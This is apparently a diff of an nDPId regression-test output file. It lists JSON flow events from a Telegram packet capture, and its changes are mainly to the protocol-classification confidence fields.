+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618946,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619007,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779618748,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601223,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779611355,"flow_last_seen":1588779611657,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1588779597291,"flow_last_seen":1588779653520,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":2502,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655297,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1588779596465,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":2177,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601223,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779611355,"flow_last_seen":1588779611657,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1588779597291,"flow_last_seen":1588779653520,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":2502,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655297,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1588779596465,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":2177,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1588779596464,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1588779596464,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779639103,"flow_last_seen":1588779650102,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":28150,"dst_port":59772,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779639103,"flow_last_seen":1588779650102,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":28150,"dst_port":59772,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1588779608134,"flow_last_seen":1588779649019,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779637830,"flow_last_seen":1588779640832,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779617174,"flow_last_seen":1588779618677,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634764,"flow_last_seen":1588779634797,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779598465,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779648840,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651686,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":298,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":54896,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651659,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
